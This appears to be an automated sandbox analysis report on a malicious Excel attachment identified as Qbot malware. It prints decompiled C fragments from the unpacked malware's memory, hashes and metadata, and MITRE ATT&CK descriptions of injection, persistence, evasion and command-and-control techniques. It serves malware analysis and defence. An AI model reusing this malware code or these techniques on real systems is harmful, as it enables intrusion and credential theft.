Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: AddressProc$HandleLibraryLoadModule
String ID:
API String ID: 384173800-0
Opcode ID: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
Instruction ID: f71a99207cef5de23c8ddc2f8d773f6edabddc3cd5bada4ad458651b88394428
Opcode Fuzzy Hash: 8b0f860062b7566b354e1c94a9238a23d10e63c9254979b45f4c1e3852145292
Instruction Fuzzy Hash: E4A17AB5A01209EFCF54CFA8C885AADBBF1FF08314F148459E815AB351D734AA81DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00081C68, Relevance: 6.1, APIs: 4, Instructions: 106
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00081C68(signed int __ecx, void* __eflags, void* __fp0) {
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v28;
				void* _t13;
				intOrPtr _t15;
				signed int _t16;
				intOrPtr _t17;
				signed int _t18;
				char _t20;
				intOrPtr _t22;
				void* _t23;
				void* _t24;
				intOrPtr _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t43;
				intOrPtr _t48;
				void* _t51;
				signed int _t61;
				signed int _t64;
				void* _t71;

				_t71 = __fp0;
				_t61 = __ecx;
				_t41 =  *0x9e6dc; // 0x1e4
				_t13 = E0008A4BF(_t41, 0);
				while(_t13 < 0) {
					E0008980C( &_v28);
					_t43 =  *0x9e6e0; // 0x0
					_t15 =  *0x9e6e4; // 0x0
					_t41 = _t43 + 0xe10;
					asm("adc eax, ebx");
					__eflags = _t15 - _v24;
					if(__eflags > 0) {
						L9:
						_t16 = 0xfffffffe;
						L13:
						return _t16;
					}
					if(__eflags < 0) {
						L4:
						_t17 =  *0x9e684; // 0x12af8f0
						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x9e6d0, 0);
						__eflags = _t18;
						if(_t18 == 0) {
							break;
						}
						_t35 =  *0x9e684; // 0x12af8f0
						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
						_t41 =  *0x9e6dc; // 0x1e4
						__eflags = 0;
						_t13 = E0008A4BF(_t41, 0);
						continue;
					}
					__eflags = _t41 - _v28;
					if(_t41 >= _v28) {
						goto L9;
					}
					goto L4;
				}
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t20 =  *0x9e6e8; // 0x12afdb8
				_v28 = _t20;
				_t22 = E0008A6A9(_t41, _t61,  &_v16);
				_v20 = _t22;
				if(_t22 != 0) {
					_t23 = GetCurrentProcess();
					_t24 = GetCurrentThread();
					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x9e6d0, 0, 0, 2);
					E0008980C(0x9e6e0);
					_t64 = E00081A1B( &_v28, E00081226, _t71);
					__eflags = _t64;
					if(_t64 >= 0) {
						_push(0);
						_push( *0x9e760);
						_t51 = 0x27;
						E00089F06(_t51);
					}
				} else {
					_t64 = _t61 | 0xffffffff;
				}
				_t29 =  *0x9e684; // 0x12af8f0
				 *((intOrPtr*)(_t29 + 0x30))( *0x9e6d0);
				_t48 =  *0x9e6dc; // 0x1e4
				 *0x9e6d0 = 0;
				E0008A4DB(_t48);
				E0008861A( &_v24, 0);
				_t16 = _t64;
				goto L13;
			}

0x00081c68
0x00081c75
0x00081c77
0x00081c7e
0x00081ce4
0x00081c8b
0x00081c90
0x00081c96
0x00081c9b
0x00081ca1
0x00081ca3
0x00081ca7
0x00081d15
0x00081d17
0x00081d99
0x00081d9f
0x00081d9f
0x00081ca9
0x00081cb1
0x00081cb1
0x00081cbd
0x00081cc3
0x00081cc5
0x00000000
0x00000000
0x00081cc7
0x00081cd1
0x00081cd7
0x00081cdd
0x00081cdf
0x00000000
0x00081cdf
0x00081cab
0x00081caf
0x00000000
0x00000000
0x00000000
0x00081caf
0x00081cee
0x00081cef
0x00081cf0
0x00081cf1
0x00081cf2
0x00081cf7
0x00081d01
0x00081d06
0x00081d0e
0x00081d29
0x00081d2c
0x00081d36
0x00081d41
0x00081d54
0x00081d56
0x00081d58
0x00081d5a
0x00081d5b
0x00081d63
0x00081d64
0x00081d6a
0x00081d10
0x00081d10
0x00081d10
0x00081d6b
0x00081d76
0x00081d79
0x00081d7f
0x00081d85
0x00081d90
0x00081d97
0x00000000

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e5d1b1923da54aa82617f9d89ec702fdab843db12d3064c823b188d08538140
Instruction ID: b7eecfca9752b51bd3878614f3e3ca223f58aa9d07610ca166e7e1ee13e62024
Opcode Fuzzy Hash: 1e5d1b1923da54aa82617f9d89ec702fdab843db12d3064c823b188d08538140
Instruction Fuzzy Hash: A431C232604340AFE754FFA4EC859AA77ADFB943A0F54092BF581C32E2DE389C058756

Uniqueness

Uniqueness Score: -1.00%

Function 00081B2D, Relevance: 6.1, APIs: 4, Instructions: 97
threadCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E00081B2D(void* __eflags, void* __fp0) {
				char _v24;
				char _v28;
				void* _t12;
				intOrPtr _t14;
				void* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char _t24;
				intOrPtr _t26;
				intOrPtr _t28;
				intOrPtr _t33;
				intOrPtr _t38;
				intOrPtr _t40;
				void* _t41;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t51;
				void* _t61;
				void* _t71;

				_t71 = __fp0;
				_t38 =  *0x9e6f4; // 0x1e0
				_t12 = E0008A4BF(_t38, 0);
				while(_t12 < 0) {
					E0008980C( &_v28);
					_t40 =  *0x9e700; // 0x0
					_t14 =  *0x9e704; // 0x0
					_t41 = _t40 + 0x3840;
					asm("adc eax, ebx");
					__eflags = _t14 - _v24;
					if(__eflags > 0) {
						L13:
						_t15 = 0;
					} else {
						if(__eflags < 0) {
							L4:
							_t16 =  *0x9e684; // 0x12af8f0
							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x9e6ec, 0);
							__eflags = _t17;
							if(_t17 == 0) {
								break;
							} else {
								_t33 =  *0x9e684; // 0x12af8f0
								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
								_t51 =  *0x9e6f4; // 0x1e0
								__eflags = 0;
								_t12 = E0008A4BF(_t51, 0);
								continue;
							}
						} else {
							__eflags = _t41 - _v28;
							if(_t41 >= _v28) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
					L12:
					return _t15;
				}
				E0008980C(0x9e700);
				_t19 = GetCurrentProcess();
				_t20 = GetCurrentThread();
				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x9e6ec, 0, 0, 2);
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t24 =  *0x9e6e8; // 0x12afdb8
				_v28 = _t24;
				_t61 = E00081A1B( &_v28, E0008131E, _t71);
				if(_t61 >= 0) {
					_push(0);
					_push( *0x9e760);
					_t48 = 0x27;
					E00089F06(_t48);
				}
				if(_v24 != 0) {
					E00086890( &_v24);
				}
				_t26 =  *0x9e684; // 0x12af8f0
				 *((intOrPtr*)(_t26 + 0x30))( *0x9e6ec);
				_t28 =  *0x9e758; // 0x0
				 *0x9e6ec = 0;
				_t29 =  !=  ? 1 : _t28;
				_t46 =  *0x9e6f4; // 0x1e0
				 *0x9e758 =  !=  ? 1 : _t28;
				E0008A4DB(_t46);
				_t15 = _t61;
				goto L12;
			}

0x00081b2d
0x00081b33
0x00081b41
0x00081baf
0x00081b4e
0x00081b53
0x00081b59
0x00081b5e
0x00081b64
0x00081b66
0x00081b6a
0x00081c64
0x00081c64
0x00081b70
0x00081b70
0x00081b7c
0x00081b7c
0x00081b88
0x00081b8e
0x00081b90
0x00000000
0x00081b92
0x00081b92
0x00081b9c
0x00081ba2
0x00081ba8
0x00081baa
0x00000000
0x00081baa
0x00081b72
0x00081b72
0x00081b76
0x00000000
0x00000000
0x00000000
0x00000000
0x00081b76
0x00081b70
0x00081c5d
0x00081c63
0x00081c63
0x00081bb8
0x00081bcc
0x00081bcf
0x00081bd9
0x00081be5
0x00081bef
0x00081bf0
0x00081bf1
0x00081bf2
0x00081bf7
0x00081c00
0x00081c04
0x00081c06
0x00081c07
0x00081c0f
0x00081c10
0x00081c16
0x00081c1b
0x00081c21
0x00081c21
0x00081c26
0x00081c31
0x00081c34
0x00081c3c
0x00081c48
0x00081c4b
0x00081c51
0x00081c56
0x00081c5b
0x00000000

APIs

GetCurrentProcess.KERNEL32(0009E6EC,00000000,00000000,00000002), ref: 00081BCC
GetCurrentThread.KERNEL32(00000000), ref: 00081BCF
GetCurrentProcess.KERNEL32(00000000), ref: 00081BD6
DuplicateHandle.KERNEL32 ref: 00081BD9

Memory Dump Source

Source File: 0000000E.00000002.881673087.0000000000080000.00000040.00020000.sdmp, Offset: 00080000, based on PE: true

Yara matches

Similarity

API ID: Current$Process$DuplicateHandleThread
String ID:
API String ID: 3566409357-0
Opcode ID: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
Instruction ID: c21506e0fc88ba440ea6bcc6b6f55abd04b465cff164c1f0cab10b664a380183
Opcode Fuzzy Hash: f5b9d26db10020dcd7cac68cf43cf7bf7c508de2d61b361089cb2e0ad45b02f1
Instruction Fuzzy Hash: F13184716043519FF704FFA4EC899AA77A9FF94390B04496EF681C72A2DB389C05CB52

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may hook into Windows application programming interface (API) functions to collect user credentials. Malicious hooking mechanisms may capture API calls that include parameters that reveal user authentication credentials.Unlike Keylogging , this technique focuses specifically on API functions that include parameters that reveal user credentials. Hooking involves redirecting calls to these functions and can be implemented via:
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Loaded DLLs, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report CompensationClaim-1630636598-09282021.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Qbot

Yara Overview

Initial Sample

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Persistence and Installation Behavior:

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "CompensationClaim-1630636598-09282021.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: UserForm2, Stream Size: -1

General

VBA Code

VBA File Name: Module1, Stream Size: 1120

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre